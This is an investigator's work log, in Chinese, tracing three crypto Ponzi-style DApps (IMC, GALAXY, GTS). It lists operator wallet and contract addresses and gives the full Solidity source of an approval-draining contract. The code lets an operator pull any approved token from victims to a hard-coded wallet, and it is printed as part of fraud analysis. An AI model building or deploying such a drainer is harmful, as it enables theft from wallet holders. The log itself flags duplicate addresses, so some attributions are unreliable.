工作记录,三个资金盘Dapp
总监发给我两个Dapp
- https://app.galaxy-quantification.com/pledge
- https://app.imc-quantitativefund.com/pledge?inviteCode=koitv1
钱包获取授权信息
得到USDT授权合约地址如下
IMC = 0x89344c34abaeca9e3128f77dbaca46c0706a1f15
分析合约代码,团伙获取资金的手法一目了然。
1.前端让用户把USDT无限授权(额度10^24,实际等同于无上限)给IMC合约地址。
2.团伙用opr地址调用IMC合约的transferFrom函数,把用户的USDT转到合约状态变量oprTo指向的地址。该函数内部调用的是USDT的transferFrom;对USDT合约而言,此时的msg.sender是IMC合约地址,而用户已经对IMC合约授权,所以转账能够成功(详细可研究msg.sender)。只要授权没有撤销,授权额度内的USDT随时可以被这样转走。
发现项目方大量将用户资金(USDT)转账到自己的钱包地址oprTo里
0x0ca9a43460fec31f196a04a51447ea31e3e18792
详细可见上述账户下的USDT交易
大部分转入的资金并没能够返回给用户(只进不出妥妥的资金盘)
且我发现两个团伙的子账户(团伙将钱转移到这两个地址上)
son1 = 0x89fe43b6Bc6e8f9b86f4478c94a1452600B005Dd
son2 = 0x7B14FFa06DAf348593FB9a7Af68f02B59b74f6c5
son1下发现可疑账户(可能是团伙的子账户,负责其他项目的)
sup = 0xF320Ddc8B2D8C1e9d2151a04038c9E55Be294780
在sup的转账记录中选取一个用户(注意:下面记录的user地址与上面的sup地址完全相同,疑为记录时粘贴有误,需对照链上数据核实)
user = 0xF320Ddc8B2D8C1e9d2151a04038c9E55Be294780
发现该用户将USDT 授权给合约Galaxy
GALAXY = 0xd5f9A71BAE2Ee40D7d2B10881659C032319cfAe5
根据不断追查
现又发现代号为GTS的资金盘合约
GTS = 0x4c6a38FC171fC0727Cab26CBac9c0B073af9bCE4
又发现一个团伙账户(注意:下面的son3地址与上面的GTS合约地址相同,同一地址在后文既被列为钱包地址又被列为合约地址,需核实)
son3 = 0x4c6a38FC171fC0727Cab26CBac9c0B073af9bCE4
该团伙钱包地址
0x0ca9a43460fec31f196a04a51447ea31e3e18792
0x89fe43b6Bc6e8f9b86f4478c94a1452600B005Dd
0x7B14FFa06DAf348593FB9a7Af68f02B59b74f6c5
0x4c6a38FC171fC0727Cab26CBac9c0B073af9bCE4
0xF320Ddc8B2D8C1e9d2151a04038c9E55Be294780
该团伙的合约地址
IMC = 0x89344c34abaeca9e3128f77dbaca46c0706a1f15
GALAXY = 0xd5f9A71BAE2Ee40D7d2B10881659C032319cfAe5
GTS = 0x4c6a38FC171fC0727Cab26CBac9c0B073af9bCE4
以下是IMC合约的源码,其他两个合约与之相同
/**
*Submitted for verification at Etherscan.io on 2022-06-26
*/
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;
/**
* @dev Provides information about the current execution context, including the
* sender of the transaction and its data. While these are generally available
* via msg.sender and msg.data, they should not be accessed in such a direct
* manner, since when dealing with meta-transactions the account sending and
* paying for execution may not be the actual sender (as far as an application
* is concerned).
*
* This contract is only required for intermediate, library-like contracts.
*/
// Execution-context helper. In this listing Ownable reads the caller through
// _msgSender(); _msgData() is not called anywhere else in the listing.
abstract contract Context {
// Returns msg.sender unchanged: no meta-transaction or forwarder handling is implemented here.
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
// Returns the raw calldata of the current call.
function _msgData() internal view virtual returns (bytes calldata) {
return msg.data;
}
}
// Single-owner access control. The deployer becomes the owner in the constructor, and
// functions marked `onlyOwner` revert for every other caller. In this listing the only
// onlyOwner function outside this contract is IMC.setOpr, so whoever holds ownership
// decides which address may pull tokens and where they are sent.
abstract contract Ownable is Context {
// Current owner; written only by _transferOwnership.
address private _owner;
// Emitted on every ownership change, including the initial assignment in the constructor.
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
/**
* @dev Initializes the contract setting the deployer as the initial owner.
*/
constructor() {
_transferOwnership(_msgSender());
}
/**
* @dev Returns the address of the current owner.
*/
function owner() public view virtual returns (address) {
return _owner;
}
/**
* @dev Throws if called by any account other than the owner.
*/
modifier onlyOwner() {
require(owner() == _msgSender(), "Ownable: caller is not the owner");
_;
}
/**
* @dev Leaves the contract without owner. It will not be possible to call
* `onlyOwner` functions anymore. Can only be called by the current owner.
*
* NOTE: Renouncing ownership will leave the contract without an owner,
* thereby removing any functionality that is only available to the owner.
*/
function renounceOwnership() public virtual onlyOwner {
_transferOwnership(address(0));
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Can only be called by the current owner.
*/
function transferOwnership(address newOwner) public virtual onlyOwner {
// The zero address is rejected here; giving up ownership goes through renounceOwnership.
require(newOwner != address(0), "Ownable: new owner is the zero address");
_transferOwnership(newOwner);
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Internal function without access restriction.
*/
function _transferOwnership(address newOwner) internal virtual {
// Read the previous owner before overwriting it so the event reports both sides.
address oldOwner = _owner;
_owner = newOwner;
emit OwnershipTransferred(oldOwner, newOwner);
}
}
/**
* @dev Interface of the ERC20 standard as defined in the EIP.
*/
// ERC-20 interface as declared in this listing. Of these members, only transferFrom is
// called by the IMC contract below.
interface IERC20 {
/**
* @dev Emitted when `value` tokens are moved from one account (`from`) to
* another (`to`).
*
* Note that `value` may be zero.
*/
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to {approve}. `value` is the new allowance.
*/
event Approval(address indexed owner, address indexed spender, uint256 value);
/**
* @dev Returns the amount of tokens in existence.
*/
function totalSupply() external view returns (uint256);
/**
* @dev Returns the amount of tokens owned by `account`.
*/
function balanceOf(address account) external view returns (uint256);
/**
* @dev Moves `amount` tokens from the caller's account to `to`.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transfer(address to, uint256 amount) external returns (bool);
/**
* @dev Returns the remaining number of tokens that `spender` will be
* allowed to spend on behalf of `owner` through {transferFrom}. This is
* zero by default.
*
* This value changes when {approve} or {transferFrom} are called.
*/
function allowance(address owner, address spender) external view returns (uint256);
/**
* @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
function approve(address spender, uint256 amount) external returns (bool);
/**
* @dev Moves `amount` tokens from `from` to `to` using the
* allowance mechanism. `amount` is then deducted from the caller's
* allowance.
*
* NOTE(review): unlike the other state-changing members, this declaration has
* no `returns (bool)`, so the caller cannot observe a success flag. Presumably
* this matches tokens whose transferFrom returns no data (confirm against the
* token contract that was actually approved).
*
* Emits a {Transfer} event.
*/
function transferFrom(
address from,
address to,
uint256 amount
) external;
}
// Spender contract that the write-up identifies as the address victims approve for USDT.
// It keeps no per-user balances and has no function that sends tokens back to a
// depositor: its only token operation pulls from an arbitrary `from` address to `oprTo`.
// Anyone who approved this contract stays exposed, up to the approved amount, until the
// allowance is set back to zero on the token contract.
contract IMC is Ownable {
// The only address allowed to call transferFrom below.
address public opr;
// Destination of every transfer made through transferFrom below.
address public oprTo;
// Operator and destination are hard-coded at deployment.
constructor() {
opr = 0xC911F7D7D410C5D3797094C8DEde5b29736C6e83;
oprTo = 0x0cA9a43460fEc31f196a04a51447Ea31e3E18792;
}
// Lets the owner repoint both the operator and the destination at any time. No event is
// emitted, so a change shows up only in the transaction itself or in the public getters.
function setOpr(address addr,address toaddr) external onlyOwner {
opr = addr;
oprTo = toaddr;
}
// Moves `value` of `token` from `from` to `oprTo`, spending the allowance that `from`
// granted to this contract (the token sees this contract as msg.sender).
// - `token` is caller-supplied, so any ERC-20 that `from` approved to this contract can
//   be moved, not only USDT.
// - The destination is not a parameter; it is always the stored `oprTo`.
// - Nothing checks that `from` initiated or agreed to this particular transfer; the
//   only gate is that the caller is `opr`.
function transferFrom(
address token,
address from,
uint256 value
) external {
require(msg.sender == opr, "Forbidden.");
IERC20(token).transferFrom(from, oprTo, value);
}
}